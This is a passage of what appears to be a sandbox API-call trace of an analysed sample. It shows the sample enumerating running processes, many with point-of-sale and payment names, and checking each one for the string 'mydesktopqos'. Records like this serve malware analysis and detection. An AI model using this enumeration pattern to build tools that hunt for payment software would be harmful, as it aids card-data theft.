th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0095.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.570] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573638 [0095.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3573638, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0095.570] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0095.571] StrStrIA (lpFirst="winscp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.571] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0095.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.572] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574ae8 [0095.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3574ae8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0095.572] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0095.572] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="mydesktopqos") returned 0x0 [0095.572] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0095.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.573] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35748a8 [0095.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35748a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0095.573] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0095.573] StrStrIA (lpFirst="active-charge.exe", lpSrch="mydesktopqos") returned 0x0 [0095.573] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0095.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.574] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573530 [0095.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3573530, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.574] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0095.575] StrStrIA (lpFirst="accupos.exe", lpSrch="mydesktopqos") returned 0x0 [0095.575] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0095.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.576] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573458 [0095.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3573458, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0095.576] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0095.576] StrStrIA (lpFirst="afr38.exe", lpSrch="mydesktopqos") returned 0x0 [0095.576] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0095.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.606] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573668 [0095.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3573668, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0095.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0095.606] StrStrIA (lpFirst="aldelo.exe", lpSrch="mydesktopqos") returned 0x0 [0095.606] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0095.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.607] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3573470 [0095.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3573470, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0095.607] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0095.607] StrStrIA (lpFirst="ccv_server.exe", lpSrch="mydesktopqos") returned 0x0 [0095.607] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0095.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0095.609] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3574b68 [0095.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3574b68, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0095.609] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0095.609] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="mydesktopqos") returned 0x0 [0095.609] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0095.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.610] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574b08 [0095.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3574b08, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0095.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0095.610] StrStrIA (lpFirst="creditservice.exe", lpSrch="mydesktopqos") returned 0x0 [0095.610] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0095.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.611] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573650 [0095.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3573650, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0095.611] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0095.611] StrStrIA (lpFirst="edcsvr.exe", lpSrch="mydesktopqos") returned 0x0 [0095.611] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0095.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.614] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573398 [0095.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3573398, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0095.614] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0095.614] StrStrIA (lpFirst="fpos.exe", lpSrch="mydesktopqos") returned 0x0 [0095.614] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0095.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.615] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573488 [0095.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3573488, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0095.615] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0095.615] StrStrIA (lpFirst="isspos.exe", lpSrch="mydesktopqos") returned 0x0 [0095.615] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0095.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.616] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35748c8 [0095.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x35748c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0095.616] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0095.617] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="mydesktopqos") returned 0x0 [0095.617] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0095.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.618] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35734a0 [0095.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35734a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.618] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0095.618] StrStrIA (lpFirst="omnipos.exe", lpSrch="mydesktopqos") returned 0x0 [0095.618] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0095.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.619] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573548 [0095.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3573548, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.619] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0095.619] StrStrIA (lpFirst="spcwin.exe", lpSrch="mydesktopqos") returned 0x0 [0095.619] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0095.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.620] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3574928 [0095.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3574928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0095.620] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0095.620] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="mydesktopqos") returned 0x0 [0095.621] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0095.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.622] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35734b8 [0095.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35734b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0095.622] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0095.622] StrStrIA (lpFirst="utg2.exe", lpSrch="mydesktopqos") returned 0x0 [0095.622] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0095.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.623] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573578 [0095.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3573578, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0095.623] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0095.623] StrStrIA (lpFirst="saying.exe", lpSrch="mydesktopqos") returned 0x0 [0095.623] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0095.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.624] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573848 [0095.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3573848, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0095.624] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0095.624] StrStrIA (lpFirst="ripe.exe", lpSrch="mydesktopqos") returned 0x0 [0095.624] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0095.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.626] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35736e0 [0095.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35736e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0095.626] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0095.626] StrStrIA (lpFirst="acoustic.exe", lpSrch="mydesktopqos") returned 0x0 [0095.626] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0095.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.627] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573710 [0095.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3573710, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0095.664] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0095.664] StrStrIA (lpFirst="mail.exe", lpSrch="mydesktopqos") returned 0x0 [0095.664] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.666] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573680 [0095.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3573680, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.666] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.666] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mydesktopqos") returned 0x0 [0095.666] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.667] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573818 [0095.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573818, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.668] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.668] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, 